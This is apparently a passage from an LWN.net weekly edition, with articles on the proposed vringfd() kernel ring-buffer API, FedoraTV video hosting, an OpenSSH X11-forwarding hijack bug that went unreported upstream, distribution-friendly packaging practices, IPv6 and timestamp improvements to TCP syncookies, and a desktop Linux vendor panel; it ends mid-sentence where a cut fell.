Once the application has this whole data structure set up, it can establish
the ring buffer with the kernel with the new system call:


Here, addr is the base address of the data structure described
above, ring_size is the number of descriptors in the ring, and
last_used is a 16-bit unsigned integer indicating which entry in
the used ring was last consumed by the application.  Failure to
keep last_used current will not slow things down, but it will keep
poll() from working properly.

The return value will be a file descriptor associated with the ring.

Creating the vring is only part of the job, though.  The next step is to
connect it with a kernel subsystem for the transfer of data.  Rusty's patch
includes vring support in the tun virtual network driver; to use that
support, an application makes a special ioctl() call to provide
the vring file descriptor to the tun driver.  Any other subsystem will need
a similar mechanism to support vring.

If the application is using the ring to transfer data into the kernel, it
must (1) set up one or more descriptors for full data buffers in the
available ring, then (2) make a write() call to the
vring file descriptor.  The buffer and length passed to write()
are ignored; all that matters is that a write was done to that file
descriptor.  When write() returns the operation will have been set
in motion, but it cannot be considered to be complete until the ring
descriptors show up in the used ring.

For data transfers from the kernel to user space, the application simply
puts buffers into the available ring, then waits until they show
up in the used ring.  A poll() on the vring file
descriptor will block until buffers are available.  The kernel determines
whether unconsumed buffers exist in used by comparing the 
vring_used-&gt;idx index against the application-supplied
last_used value.  It's worth noting that, depending on how the
relevant kernel subsystem works, buffers may not actually make it into the
used ring until the poll() call is made.


On the kernel side, a developer wanting to add vring support to a subsystem
will start by creating a set of vring_ops:


All of these functions take a private pointer given when the subsystem
attaches to the vring (to be described shortly).  The pull()
callback is invoked when the application calls poll(); if there is
any descriptor processing which must be done with user space accessible,
this is the place to do it.  If pull() adds any buffers to the
used ring, it should return the number of buffers; it can also
return a negative error code.  push() is called from a
write() call indicating that there are buffers ready to be
transferred into the kernel; it returns zero or a negative error code.  The
destroy() callback is called when the vring file descriptor is
closed.  All of these callbacks are optional.

Attaching to a vring is done with:


For this call, fd is a file descriptor corresponding to a vring,
ops is the operations structure described above, data is
a private data pointer which is passed into the vring_ops
callbacks, and atomic_use is nonzero if the kernel needs to be
able to add buffers to the used ring in atomic context.  The
return value is a pointer to an internal vring data structure or an
ERR_PTR() value if something goes wrong.

To obtain a buffer from the available ring, a call is made to:


This function will fill in an array of iovec structures
corresponding to the next available buffer.  If the kernel expects to write
to the buffer, it should set in_iov to the iovec array,
num_in pointing to the length of in_iov, and
in_len pointing to a location to store the total length of the
buffer (or NULL if that information is not useful).  For transfers
into the kernel, out_iov, num_out, and out_len
should be set similarly.  Note that the addresses stored in the
iovec arrays are user-space addresses; vring_get_buffer()
does not validate them, so the caller must do so.


It is possible to set pass both in_iov
and out_iov; in this case, one of the two will be set, depending
on whether the next buffer in the available ring has the
VRING_DESC_F_WRITE flag set.  In most cases, though, only one of
the two sets of parameters will have non-NULL values.  The
apparent intent of the API is that, if bidirectional transfers between
user space and the kernel are needed, two separate vrings should be used.

The return value from vring_get_buffer will be one of (1) a
positive descriptor index, (2) zero, indicating that no buffers are
available, or (3) a negative error code.  


The descriptor index should be saved the the final step, which is indicating
that the kernel is done with a specific buffer:


Either one of these functions indicates that the buffer indicated by
id should be put into the used ring; len is the
amount of data actually transferred.  If sleeping is not possible,
vring_used_buffer_atomic() should be used - but the vring must
have been attached with the atomic_use flag set.

There does not appear to be a way for a subsystem to detach from a vring;
it must, instead, wait for the application to close the associated file
descriptor.


This interface is in an early stage, and the code has a number of
limitations and FIXME comments.  So things seem likely to evolve before
vringfd() is seriously considered for merging into the mainline
kernel.  The idea of a ring buffer for this kind of communication seems to
come around on a regular basis, though, so it would seem that there is a
demand for this kind of API.

		Video forums for free software


Over the last few years, we have seen the rise of video content on the web,
but much of that content has been locked up in non-free formats.  Patented
video codecs are a big part of the problem, though there are free
alternatives (Theora and Dirac for example), they are not
widely used.  Free software projects often use videos as part of their
marketing and documentation, using screencasts to highlight interesting or exciting features
of the program for example. But the choices for collecting and distributing
video content leave much to be desired for free software advocates.


The Fedora project has been looking into this problem lately, in support of
its FedoraTV project.  A recent thread on the fedora-advisory-board
mailing list looks at various alternatives now that the original host
of FedoraTV content, luluTV, has gone out
of business.  Greg DeKoenigsberg outlines the problem:

The original goal of Fedora TV was to provide a "Fedora-friendly" home for 
videos that we had some control over.  I think this is still a worthwhile 
strategic goal, but since we no longer have the help of dedicated
engineers, I 
no longer think it's a sensible tactical goal.

The question that follows: "we've got lots of people who are excited about 
making Fedora videos.  What's the best way, in the short term, to gather
those 
videos together to make them accessible?"


He goes on to outline the criteria for finding a near-term solution,
starting with the absolute requirements: Ogg Theora format, one-click
download, and a robust, stable hosting site.  Also important, but not as
critical are things like the ability to extract static screenshots for
posting in various places, an easy way for community members to know when
new videos are available (an RSS feed for example), and a way for uploaders
to easily associate a license with their video.  These should resonate with
most projects that have an interest in providing a video forum for their
community as they are likely to have many of the same needs.


Transcoding the videos to Flash to reach the largest possible audience is
DeKoenigsberg's "controversial" criteria.  It is an
unfortunate truth that, even for fairly strong free software proponents, the
Flash browser plugin provides the simplest route to viewing online videos.
Other solutions exist and work, but require a great deal more effort to
enable additional software repositories so that the proprietary or patented
codecs can be installed.  Interestingly, there were no arguments presented
against the transcoding suggestion.


For Fedora, where Theora—or other free codec—viewers are easily available, Flash transcoding
might be less of a requirement.  Other projects, especially those that are
cross-platform, may find that a large part of their community is either
unable or unwilling to install additional software to view videos.  Users
of non-free operating systems are largely unaware of the video codec
problems; their OS comes with a no-extra-cost video viewer that just
works. Because of that, transcoding to Flash does at least provide a way to
present videos that can be relatively easily viewed by free and non-free
systems alike.


Various solutions to the hosting problem were discussed, from partnering
with archive.org to rolling their own
using MediaWiki, Plumi, or some of the technology released
by luluTV.  One of the suggestions that got the most attention was to
create a Miro channel hosted, at
least temporarily, on Fedora project servers.  Miro has a lot of promise as
a viewer and organizer of videos, with a BitTorrent client built-in, but it
doesn't solve the other half of the problem: how to allow the community
to contribute.


There is, it seems, a growing need for a free community video forum, both
from a code and a hosting perspective.  The bandwidth and storage requirements of video
are enormous, so covering the actual cost will be a big challenge.  Places like YouTube allow short videos to be uploaded, but
they can only be played back via Flash.  In addition, their software is not
free, so they only solve parts of the problem.


There are no obvious free
solutions, yet, but it is a problem that we will be facing more frequently.  
Somehow leveraging Miro as a free, cross-platform video delivery system may
make the most sense.  Providing a way for the community to upload video
content into the channels would make for a mostly working FedoraTV and
other projects like that.  Miro supports
free codecs as well, which might help to start weaning people away from their
current non-free codec addiction.  Then we can start figuring out how to
pay for the network and hard disk capacity required.


		OpenSSH bug falls through the cracks


Linux distributions often patch the software they distribute, to fix bugs
or add features.  Anything they add is pushed upstream to the project
responsible for the package—at least in theory.  When that theory is
not borne out in practice, it can lead to the kind of unhappiness and
finger pointing that went along with a recent OpenSSH release.  The
release notes point at Debian for failing to report it upstream, but the bug was actually fixed much earlier, in Red Hat Enterprise Linux 4 (RHEL4).


The bug in question is rather nasty, allowing a local attacker to hijack X
Windows programs of a user who logged in using ssh with X forwarding
enabled.  Under those 
circumstances, the ssh client and server arrange that any X programs started on the
logged-in machine actually display on the client machine's desktop.  This
is very useful for running X programs across the internet as the X
traffic is encrypted as part of the ssh session. 


Due to a broken interaction with Internet Protocol version 6
(IPv6)—the next generation protocol for internet traffic—ssh
can 
get confused about the port number of the X server.  If a particular port
(which maps to the X DISPLAY environment variable) is not available to be
used under IPv4—the protocol in use today—but is available under
IPv6, the ssh server will incorrectly set DISPLAY.  If it is an attacker's
program that is listening on the IPv4 port, it will be able to hijack X
programs that get run.


Up until sometime in the last several years, this would not have happened for most Linux
boxes because IPv6 was generally not enabled.  In that case, the ssh server
would recognize that it could not get the port it wanted and try another,
eventually setting DISPLAY correctly.  Because IPv6 is much newer, these
kinds of bugs may exist in other network programs.  This bug should serve
as a reminder to developers to closely check their IPv6 support. 


Clearly, though, the bug fell through the cracks.  The OpenSSH team shows
its annoyance in the release notes:

We apologise for any inconvenience resulting from this release
being made so shortly after 4.9. Unfortunately we only learned of
the below security issue from the public CVE report. The Debian
OpenSSH maintainers responsible for handling the initial report of
this bug failed to report it via either the private OpenSSH security
contact list (openssh@openssh.com) or the portable OpenSSH Bugzilla
(http://bugzilla.mindrot.org/).


It was reported
in January to the Debian bug tracking system, but not fixed and released
until late March.  OpenSSH does releases every six months or so, with 4.9
being released on March 30.  Having to turn around another release four days
later to fix a problem that was known for a few months could certainly make
for annoyed developers.  So how did the bug get fixed in Debian, with a
Common
Vulnerabilities and Exposures (CVE) number being assigned, but without
notifying the OpenSSH team?


The Debian bug entry is instructive, because it documents some of the
steps that led to the hurried release.  In particular, Phil Miller
thought he had done the right thing to report the problem in February:

As noted in the control section, I have forwarded this to Theo
DeRaadt, the point of contact for security issues found in OpenBSD's
software.


That email must have gotten lost or been eaten by a spam filter as de Raadt would presumably have gotten it to the right
people had he seen it.  The bug description clearly puts it in the realm of
a security problem, but the bug was not classified that way in the Debian
system.  Had it been, it would have been handled differently, possibly
triggering an email to the proper place.  But the bug report also shows
that Red Hat fixed it in 2005.


It was reported to Red Hat by a customer and got entered into their bugzilla
as bug
#163732.  Unfortunately, that bug report is confidential because it
contains potentially sensitive
customer information.  This makes it difficult to track further.
Indications are that it was not seen as a security problem and that it was
believed to have been already known as an OpenSSH bug.  Apparently no one
checked to make sure the OpenSSH folks knew of it though.


Closer cooperation between the OpenSSH maintainers for Red Hat and the
upstream team would probably have helped.  Red Hat has been carrying the patch
along for quite some time.  Because the security implications were not
clear and the patch is quite simple, it may not have seemed to be all that
necessary to get it upstream.  Though, there are more than twenty patches listed in
the fedora OpenSSH CVS repository for rawhide, which will become Fedora 9.


The OpenSSH team would be well served by paying closer attention to various
distribution patches to their code as well.  It is certainly plausible that
those interested in finding security holes to exploit might start by seeing
if any patches floating around for critical services like OpenSSH were
useful.  By being more proactive, OpenSSH might have found and fixed this
bug much earlier.  The way this particular bug avoided notice seems to be
mostly happenstance; if there is blame to be placed, there is plenty to go
around. 


RHEL and other "enterprise" distributions have long support cycles which
means that the versions of various packages being maintained are well behind the upstream
project.  It doesn't take very many bug reports getting shot down because
they have already been fixed in a more recent version before distribution
maintainers lose enthusiasm for making those reports.  But it is an
essential part of the process.  The OpenSSH team has the reputation of
being somewhat difficult to work with, which may have helped this
particular problem get overlooked.


It is a difficult problem to solve fully.  Distributions have their own
set of requirements which may be in opposition to those of the upstream
project.  Those projects may also have policies and procedures that
distributions are not up to speed on.  The Linux kernel often sees the same
kind of conflicts, which is why distributions often maintain their own set
of kernel patches for features their customers need.  But it is in
everyone's best interest to work those problems out so that distributions
carry along as few patches as possible while upstream projects do not miss
out on bug fixes and features.


		Distribution-friendly projects Part 2


[Editor's note: This article, which looks at the interactions of software projects and distribution providers, is presented in three parts.  Part 1 introduces the concepts found here, in part 2.]

Technical needs

Under the name technical needs we're going to see a series of
requests that distributors often have to make to the original
developers of the software they want to package. Not all these requests
are made by all distributors. Some will care more about one particular
aspect than another.  Some might apply only on non-mainstream
distributions, and some distributions might just want to take care of
philosophical needs and leave the technical side entirely alone, even if
similar distributions aren't exactly common.

Most of the technical needs described in this article are present in
the policies set forth by Debian (written), Gentoo (mostly unwritten), and
apply to other distributions as well. Some of these needs won't be encoded
in any policy and are often not requested explicitly by the developers.
Those are mostly details that make a distributor's life easier.  These
details may not be mandatory, but it's still worth considering them.  The
easier the life of the downstream maintainer is, the easier it is
for the software to be packaged.

Also, it's important to note that when a distribution makes a request,
it might not be alone. Other distributions might want to take
advantage of the same change, but they didn't have time to request it,
or simply preferred to wait before packaging the software until some
issues were resolved. Don't just ignore the request because the
distribution which contacted you already took care of the issue by
patching your software.  Acknowledge the request and apply the patch,
it will make both your and their life easier on the long term.

Sane version information Distributions often rely on the
version information provided by the original software developers. This
usually means that they don't expect huge changes between version
$x.y.z$ to version $x.y.z+1$.

One very common scheme for versions is the major, minor,
micro version, which in the example above would be respectively
$x$, $y$ and $z$ (it's a common misconception that $y$ is the
major version component).

The way this kind of scheme is usually applied relates to the
compatibility of the programming interface (API and ABI). Changes in the
software warrant increments of various version components depending on the
amount of changes in the interfaces:

 adding zero or more interfaces, without changing or removing
  previous interfaces, or the behaviour expected from them - meaning
  the software is entirely compatible with the older version - usually
  only require an increment of micro version;
 changing or removing interfaces, usually deprecated - in such a
  way that older software might require to be adapted, but not
  rewritten - usually require an increment of minor version;
 changing the interface entirely - requiring users of the
  software to rewrite their code, or otherwise do major structural
  changes - usually require an increment of the major version.


Obviously, increasing one component will usually involve resetting to
zero the version components on the right.

There might be other components, too. For instance if the source
archive has to be regenerated without any code change (missing file,
updated addresses for the maintainers or the homepages), rather than
changing the version entirely, a suffix might just be added at the end
of the version, making it, for instance $1.2.3a$ or $1.2.3c$. If just
a security issues has been fixed, it could also be expressed by adding
a nano component to the version, like $1.3.34.1$, to
emphasize that there is no change other than the security fix.

The source archives for the software should be named after both the
project and the version, resulting in names like
foobar-1.3.4.tar.gz.  Having different versions of the same
software that don't have the same naming causes confusion.

It is quite important for the distributions that source archives not be
changed without changing the name: distributions usually make sure that
the checksum (usually MD5, but often nowadays SHA1) of the archive is
the one they recorded, and changing the tarball without notice often
leads to failed builds.

There is a similar issue with the naming of the directory inside the
archive. Most distributions assume that the source is included inside
a directory with the same name of the archive (minus the extension),
but often enough the archive contains sources not organised in a
directory, or a directory with the name of the project without
version. Similarly, if possible the directory should also contain
eventual suffixes, to avoid adding extra cases in their presence.

Distribution methods like Ruby Gems and Python Eggs mandate similar
version schemes for their packages for the same reason Free Software
distribution would prefer them: it makes it easier to compare versions,
and know when something has to be updated.

Internal libraries One common issue considered by both Debian and
Gentoo policies relates to the use of internal copies of
libraries. Sometimes the software needs some uncommon libraries to
work properly. These libraries are unlikely to be found on users'
systems, which would require them to download and install them
separately.  Such a task is not easy for new users. A few projects will
keep an internal copy of the libraries they want to use for that reason,
and will use that internal copy unconditionally.

Adding an internal copy of a library seems cheap to the original
developers, and it's convenient for users to download and install a single
package, however this causes a large number of problems to the
distributors. The first problem is that they might have to patch the same
bug several times.  Let's all think of zlib as a practical
example, a very common library implementing the classic deflate algorithm
of compression.  It's a very small library, that a lot of projects imported
internally over the years. Not too long ago, a serious security issue was 
found in the code of zlib, and all the distributors had to patch
it out as fast as they could. In a perfect world, patching zlib,
and eventually rebuilding everything that linked to it would have sufficed.
Unfortunately, we're not in a perfect world.  More software was packaged
with internal copies of the library, requiring each of those packages to be
patched to make sure the issue was solved.


There are many other implications with using internal bundled copies
of libraries, and most of them are critical for distributors. These
problems increase their complexity when the internal copies of
libraries are modified to suit better the use the application has for
them. In those cases, even though the source might be advertised as
being part of another library, they are actually different from that
library, and their replacement might be impossible, or may cause
further problems.


 The code is no longer shared between programs: not only
  the source code, which requires extra work to fix bugs and security
  issues, but also executable code and data. When shared libraries are
  used, the memory used by processes loading them is reduced, as they
  will share code and part of the data. This cannot be done when using
  static libraries or, worse, internal copies of libraries.
 Symbols may collide during the loading: modern Linux
  and Unix systems use the ELF format for programs and libraries. This
  format provides a so-called flat namespace for the symbols
  (data and functions) to be found. When using internal copies of
  other libraries in a library, the two definitions of the same symbol
  might collide, and just one of them can be used. If the interface
  used by the library changed subtly, it is possible that this will
  lead the program in an execution path that was not intended and is
  not safe.
 Distribution-specific changes need to be duplicated: as
  it will be discussed later on, sometimes distributions need to make
  changes to source code, to fix bugs (security related and not), or
  change paths of files for instance. Internal copies require
  downstream maintainers to repeat these changes multiple times.

For this reason, a good compromise between the needs of the original
authors and the needs of the distributions is to treat internal copies of
libraries as untouchable, thus disallowing any changes in its
interface or behaviour.  That way those users who get the package directly
from upstream still have only one package to download and build.  The
distributions, who want to share code as much as possible, should have a
way to ask the build system to use the system copy of that library. An easy
way to implement that is to provide --with-system-libfoo
options at the ./configure call (for autoconf for
instance), or to give a WITH_SYSTEM_LIBFOO" handle at the
make command line.

By allowing the distributions to use their own copies of libraries,
the developers are still preserving the ability for the user not to
install extra dependencies, but also giving the distributions the
power they need, to avoid changing the original code, sometimes in a
conflicting way. It is important for the upstream authors to not change the
behaviour of bundled libraries, as the distributions will most likely want
to use a shared system library instead.  Modifications made to a bundled
library will likely cause problems for users who use get the package from
their distribution's repository where it has been built with a shared
system library.

An easy choice for optional dependencies Almost all distributions
prefer having a choice about the optional dependencies of a
package. Source-based distributions (like Gentoo and FreeBSD's ports
system) offer the same (or more) choices as the original project.  Gentoo's
USE flags or FreeBSD's knobs offers the user options on which
options will be enabled.  Binary distributions (like Debian or RedHat)
might want to choose options to ensure that the final binary package does
not try to use dependencies that are not present in their official
repositories.

Again, if a project does not provide an easy way to control whether
some optional dependency is used, most distributions will either try
to workaround that problem (by forcing cache discovery variables) or
change the build system themselves to get the choice to disable or
enable some dependency. This creates problems similar to the ones
discussed above: different distributions might use slightly different
changes, which may cause errors when merging them in, and they might
make errors that introduce new bugs.

As above, it's just a matter of providing a switch in the build system
(like a --disable-feature or --without-feature in
autoconf, or a WITHOUT_FEATURE knob for
make).  If the software has a plug-in infrastructure, binary
distributions might also just package the different plug-ins in different
packages, allowing the user to choose which ones to install.  Software
without plug-in structures might require building different packages with
different feature sets. For instance, if a software can use either OpenSSL
or GnuTLS as implementation of SSL/TLS layers, then the distribution might
create two packages, linking to one or the other. The user could then
choose between the two.

When some optional dependencies are discovered by the build system,
used if present and ignored if not, without a way to tell the software to
not build the optional feature that uses a library that is present on the
system, we're talking about an automagic dependency. Automagic
dependency is a term used to indicate when a package, optionally using
another, discovers its presence automatically, without allowing for the
user (or the downstream maintainer) to ask not to use it. This
kind of dependency is usually a problem just for source distributions, as
they build the software on users' systems, which may or may not have the
same configuration as the developer working on the build scripts. Binary
distributions on the other hand build their code in controlled
environments having only the stated dependencies installed. This might
actually confuse one of their developers in thinking that a given
dependency is mandatory, seeing it enabled in their local build, and
not finding an option to disable it.

In general, automagic dependencies should be avoided; having a
soft failure default is usually equivalent for the user passing by
- you enable the dependency if found, disable it if not found, but
still give a way to tell the build system to disable it even when
found.  This preserves the behaviour intended by the original developers,
but also provides the control that (source) distributions want to have over
what is built.

Control over how the software is built Another problem
shared both by binary and source distribution is having control on
how the software is built. For binary distributions this usually means
being able to impose options to the compiler, linker and other tools
during the package build process, so they respect their standard options.
For source distributions, this means allowing the user to choose the
options to provide to the compiler, linker, assembler and other build
tools, on a package-by-package basis.

This does not mean that the distributions want to force-feed extra
optimisations into software that might be fragile. This seems to be the
biggest concern of developers for not wanting to provide a way to change
the options used at compile time.

Distributions might want to reduce the optimisations used, or they might
just wish to enable (or disable) warnings to more easily spot eventual
problems with their packages.  Distributions might also want to build
debug information, or remove debug messages, and so on.  There are a huge
amount of possible combinations.

When the distributions want to reduce optimisation, that might be
because the need to create packages which work on lower architectures
not compatible with these optimisations.  Or they know that some of
these optimisations are not going to work with their environment.  They
might know that their version of the compiler does not support the
optimisation, or there could be other reasons.  Usually, the distribution
knows the best way to handle the package for their own environment.

This also leads to a compromise between upstream developers and downstream
maintainers: the former should provide their own default options and
optimisations, leaving a way to override these defaults as the
distributions see fit.  On the other hand, distributions should try their
best to determine when eventual problems might be caused by their own
choice of optimisations.  Distributions should not expect upstream
developers to fix problems that they have caused with their choice of
optimisations.  This way, it's usually possible to keep the relationship
between upstream and downstream in good terms even when the set of
optimisations used is totally different.

More times than not, the problem is not even of willingness of the
developers to provide an override, but rather a problem of actually
having such an override working. While most distribution developers
can fix these problems with relative ease, original developers would
probably want to facilitate the work of their distributors by checking
their own releases so that setting very minimal options to the
compiler will work as intended.  A common mistake is hard-setting
CFLAGS (or similar variables) in the configure.ac
file for autoconf (which otherwise has proper support for
user-chosen options).

While we're talking about compiler optimisations it's important to note
that for some software, e.g. number crunching software (multimedia
applications, cryptography tools, etc.) enabling extra optimisations is
desirable.  Even so, it should be possible to disable extensive
optimisation.  These optimisations are usually fragile, and only work in
particular environments (compiler type and version, and architectures), so
having a way for distributors to decide what they actually want to enable
is a very real need.

But having a way to provide options to compiler (C and C++,
respectively CFLAGS and CXXFLAGS) is not all that is
needed: most modern distributions might want access to the options
used by the linker (LDFLAGS) to change the kind of hash
tables to be generated, or to enforce particular security measures.  For
custom-prepared build systems, it's a common mistake to ignore this need,
or to support it in the wrong way.  Linker options should go before the
list of object files, which in turn should go before the list of libraries
to link to. This is another common mistake that distributors can fix with
relative ease, but it would be better taken care of by the original
developers, as it would require repeating the same steps for (almost) all
distributions.

[This ends part 2 of this article.  Stay tuned for part 3, which will cover
the philosophical concerns and present some conclusions.]

		Improving syncookies


Back in 1997 TCP SYN flood attacks were all the rage among script
kiddies.  A SYN flood is a denial of service attack that uses up server
resources by initiating, but not completing, a connection.  Attacks via
this method still remain a problem today though
they are now more likely to be launched by sophisticated botnets
rather than an individual. A first line defense against SYN floods is
the syncookie. The syncookie was not designed for Linux specifically
but found its way into kernel 2.1.44 via a patch from Andi Kleen.


This long-time feature generated some recent discussion when a patch was submitted adding
syncookie support to 
IPv6. The patch has now been queued for acceptance but in
discussion along the way the community also began to tackle some
longstanding limitations of syncookies and reaffirmed how relevant the 
feature continues to be.

<!-- LWNPutAdHere -->

To fully describe syncookies some background on how TCP uses a three
way handshake to establish a connection is in order. The first packet
of any TCP session received by the server is known as the SYN packet
because it carries the synchronize control flag. The SYN flag
indicates that its sender wishes to open a new connection. That flag
is only used during the opening sequence. The server responds with a
packet also containing the SYN flag because the connection needs to be
opened in both directions. This second packet also carries the ACK
flag and is known as the SYN-ACK. It serves to both open the
connection from the server to the client and to acknowledge receipt of
the opening packet from the other host. Finally, the client sends a
bare ACK packet to the server to acknowledge receipt of
server-to-client SYN-ACK and the connection is then fully established.


During a SYN flood a server receives the first packet of the three-way
TCP handshake and responds with a SYN-ACK but no further data is ever
received from the initiating client. When the SYN-ACK is generated
most servers will also create an entry in the SYN queue. This queue is
the waiting area for half-open connections awaiting handshake
completion.  The attacker intentionally orphans those entries and
instead generates more SYN packets which in turn take up more entries
in the queue. The server needs to wait for a long timeout before
giving up and recovering the connection resources. During this time
the attacker can flood it with many more half-open connections.
Eventually the server runs out of resources and cannot accept any new
connections without dropping some, perhaps legitimate, connection from
the queue. Simple solutions such as placing a quota on the number of
partially open connections per peer or using dynamically adjusted
packet filters do not work because the SYN packets are easy to forge
with fake source addresses.


A syncookie allows the server to defer using up any resources
until the third packet in the three-way handshake has been
received. At that time the peer's address has been mildly
authenticated because the final packet in the handshake contains
a reference to the sequence number that was sent by the server in the
second packet. With this assurance, packet filters and resource quotas
keyed to the peer's address will again be useful defenses against
resource attacks.


The basic mechanism of the syncookie works by carefully manipulating
the initial sequence number value of the connection instead of
choosing it at random. Upon receiving a SYN the server carefully
encodes the vital information that would have been stored as state in
the SYN queue. This encoded information is cryptographically hashed
with a secret key to form the sequence number of the SYN-ACK and sent
to the client. The third packet of a legitimate handshake, which is
the ACK from the client back to the server, contains this sequence
number (plus one) in its acknowledgment number field. In this way all
the information necessary to fully open the connection is presented
back to the server without having to maintain state while the
handshake is being completed.


The major downside to syncookies is that they only have space to
encode the most basic of TCP handshake options. At the time of initial
syncookie deployment this was not a large problem because the only option
prominently in use at the time was the Maximum Segment Size (MSS)
option. This option is provided to help the peer avoid unnecessary
fragmentation by sending packets that the other end of the connection
knows a priori are too large to cross its network. This is exactly the kind
of information that is normally stored as state in the SYN queue. The
syncookie designers knew that this option was important to performance
and found 3 bits for it in the encoded syncookie. These bits are used to
approximate the real value of the option to one of 8 common values.


In the intervening years new options have come into prominence and
these are not syncookie compatible. The most important of these are the window scaling and Selective
Acknowledgment (SACK) options. These features respectively allow the
TCP congestion control window to grow beyond 64KB and be more
efficient in the case of minor packet losses from those large
windows. Without using these features it is impossible to get good
transfer rates on networks with large bandwidth or large latency. Many
household broadband links require at least the window scaling option
to fully utilize the network connection. Due to this limitation, and
the modest computation overhead of the cryptographic hash, the
Linux stack only resorts to syncookie based connections when the
number of half-open connection exceeds a high watermark controlled by
the net.ipv4.tcp_max_syn_backlog sysctl. These connections are less
featureful than normal connections but they are only resorted to when
the queue would otherwise require active pruning.


It turns out that the cookie mechanism is only implemented for
IPv4. Recently, Glenn Griffin posted patches that add IPv6 support
for syncookies. Andi Kleen, author of the original syncookie patch,
wondered if the mechanism should be continued at all much less added
to IPv6:


Syncookies are discouraged these days. They disable too many 
valuable TCP features (window scaling, SACK) and even without them 
the kernel is usually strong enough to defend against syn floods
and systems have much more memory than they used to be.

So I don't think it makes much sense to add more code to it, sorry.


Andi's argument was three pronged. His first point was about the
reduced abilities of cookie initiated connections as already described
in this article. Over time the value of these options has increased
and therefore the cost of using syncookies has increased too. His
second point was that Linux no longer uses all of the memory necessary
for a full connection until the new connection is fully open. Instead
it uses a "minisock" for that period. The minisock is a 96 byte
struct tcp_request_sock structure holding the minimum state
necessary to get the connection fully opened. The fully established
struct tcp_sock is 1616 bytes. Both structure size
measurements refer to a 64-bit kernel. Finally, Andi points out that
the queue management routines for an overloaded SYN queue are more
sophisticated now than the dumb head drop algorithm that was in place
when syncookies were first deployed. The suggestion was that in
aggregate these advances might make Linux robust enough without
syncookies so that they could therefore be removed all together.


Instead of engaging in a theoretical discussion some readers set up and
ran their own experiments. One of the best parts of the Linux
community is the tendency to put real data behind their
arguments. While there is often disagreement over the realism of the
measured scenarios, the data points always help us better understand
the dynamics of kernel code.


Willy Tarreau: My tests on an AMD LX800 with max_syn_backlog at 63000 on an HTTP
reverse proxy consisted in injecting 250 hits/s of legitimate traffic
with 8000 SYN/s of noise.[..] Without SYN cookies, the average
response time was about 1.5 second and unstable (due to retransmits),
and the CPU was set to 60%. With SYN cookies enabled, the response
time dropped to 12-15ms only, but CPU usage jumped to 70%. The
difference appears at a higher legitimate traffic rate.


Ross Vandegrift:
Under no SYN flood, the server handles 750 HTTP requests per second,
measured via httping in flood mode. With a default tcp_max_syn_backlog
of 1024, I can trivially prevent any inbound client connections with 2
threads of syn flood.  Enabling tcp_syncookies brings the connection
handling back up to 725 fetches per second.


This data compellingly supports the continued value of the syncookie
and that position seems to have won the day. The IPv6 syncookie
patches are now queued within the network 2.6.26 development tree. 


However, the biggest news is probably that this discussion brought
renewed energy to the problem of lost handshake options. Florian
Westphal and Glenn Griffin have recently presented a solution to the
most damaging aspect of that problem too.


Their solution is to leverage
the echoed TCP timestamp option in a way similar to the way classic
syncookies leverage the echoing of the SYN-ACK sequence number in the
subsequent ACK. The timestamp option was introduced with RFC 1323 and
is widely deployed on modern Linux, Windows, and FreeBSD (including OS
X) systems. Its main purpose is to be able to increase the frequency of round
trip time measurements in the presence of large congestion control
windows.


Using the timestamp to preserve the window scale and SACK option
values requires modifying the timestamp of the SYN-ACK packet to
include the state necessary to support them. During a normal handshake the
client will echo the modified 
timestamp value of the SYN-ACK packet back to the server as part of
the timestamp option on the third part of the handshake and thus
propagate the SACK and window scale information without keeping any
state on the server.


In order to make room in the timestamp for this new information the
least significant 9 bits of the timestamp are shaved off. The encoded
representation of the window scale and SACK options are then
transferred back and forth at the minor cost of reduced granularity of
TCP timestamps during the handshake exchange. Timestamps lose their
least significant 512 jiffies with this approach.


Below are two different TCP handshakes completed with syncookies and
the timestamp patch. Note that the lowest bits of the SYN-ACK
timestamp are the same in each handshake even at different points in
time because each handshake uses the same SACK and window scaling
options. As a result the timestamp values in
each SYN-ACK are different but the lower nine bits share the same 0x166
value.


While there is no guarantee that the timestamp option will be
supported by every TCP peer, timestamps are widely deployed on the most
common operating systems. Additionally, because timestamps, window
scaling, and selective acknowledgments are all features related to
high latency and bandwidth networks it would be unlikely to find an
implementation that supported only a subset of these options.


One shortcoming of the scheme is that it is not general enough to be
future-proof as new handshake based options may continue to be
deployed. At this time the MSS, SACK, window scaling, and timestamp
options are the only handshake options seen with any regularity other
than the NOP option which is just used for packet alignment. However,
the whole point of an extensible option scheme is to leave room for
future improvements. The IANA registry that records option values was
last updated in February 2007 to reserve option code 27 for use with
Experimental RFC 4782 "Quick Start for TCP and IP". Only time will
tell if that particular option will be the next challenge to the
syncookie scheme or if something else will rise first.


The timestamp patch has only been posted very recently, and there has
been little discussion of it beyond the developers who worked directly
on it. It is not clear whether or not it will be accepted right
away into the mainline, but it certainly seems to address a well known
core problem with the syncookie at a minor cost.


With the updates for IPv6 and modern TCP option schemes syncookies
appear primed to keep providing sweet relief in their somewhat
esoteric networking security niche. Perhaps they will keep chugging
away for another 10 years without having to be re-baked.

		Discussing desktops at the Collaboration Summit


Your editor is typing this from the Linux Foundation's collaboration
summit, currently in progress in Austin, Texas.  The day's agenda includes
giving a talk on the state of the kernel during the evening reception;
beer-fueled hecklers would appear to be in your editor's near future.
The first day, though, included a rather more sober panel on the state of
the Linux desktop which revealed some interesting thoughts on where things
are going.


This panel, moderated by Steven Vaughan-Nichols, featured John Hull from
Dell, David Liu (gOS), Jim Mann (HP), Timothy Chen (Via), Kelly Fraser
(Xandros), Grégoire Gentil (Zonbu), Ellis Wang (Asus), Debra
Kobs-Fortner (Lenovo), and a representative from Everex whose name your
editor did not catch.  Together, they represented a wide range of
industries, from component makers and operating system vendors to providers
of complete systems.  They take different approaches to the Linux desktop,
but they are all optimistic about where it is heading - though some are
more so than others.


So how are these vendors doing with desktop Linux?  While all of the
vendors were optimistic, some were more guarded than others.  Dell states
that sales have "met expectations," but are aimed mostly at niche markets
so far.  There is, they say, a lot of interest in emerging markets, where
users can start with Linux from the outset and do not have to migrate from
other platforms.  HP was also moderate in its enthusiasm, saying that its
sales are "right about at the industry average."  Lenovo was cautiously
optimistic; their Thinkpad offerings are targeted at business users, which is
a slower market to get into.  According to Lenovo, most of their
Linux-based sales are custom products designed for specific businesses.


Rather more enthusiasm came from gOS, the company which supplied the
distribution for Wal-Mart's low-end PC.  Sales, they say, are "very good."
Asus is clearly happy with the success of the Eee PC.  That success, they
say, comes from the effort put into designing a complete solution for
users, with features like quick booting and solid-state storage: "you drop
it, it still works."  Everex says that "sales are brisk"; the company is
pleased and will continue to offer Linux-based products - including the
"MyMiniPC", a small system aimed specifically at MySpace users.  Via's
